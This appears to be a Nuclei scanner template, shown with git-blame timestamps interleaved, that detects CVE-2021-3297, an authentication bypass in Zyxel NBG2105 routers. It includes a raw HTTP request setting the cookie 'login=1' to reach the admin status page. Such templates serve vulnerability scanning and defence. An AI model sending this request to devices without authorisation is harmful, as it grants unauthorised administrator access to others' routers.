2021-08-02 07:34:16 +00:00
|
|
|
id: CVE-2021-3297
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-08-02 07:34:16 +00:00
|
|
|
info:
|
|
|
|
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
|
|
|
|
author: gy741
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
|
2021-08-19 13:59:55 +00:00
|
|
|
reference:
|
2021-08-02 07:34:16 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
|
|
|
|
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.zyxel.com/us/en/support/security_advisories.shtml
|
|
|
|
- https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-3297
|
|
|
|
cwe-id: CWE-287
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2021,zyxel,auth-bypass,router
|
2021-08-02 07:34:16 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /status.htm HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2021-08-19 13:59:55 +00:00
|
|
|
Cookie: language=en; login=1
|
2021-08-02 07:34:16 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "Running Time"
|
|
|
|
- "Firmware Version"
|
|
|
|
- "Firmware Build Time"
|
|
|
|
condition: and
|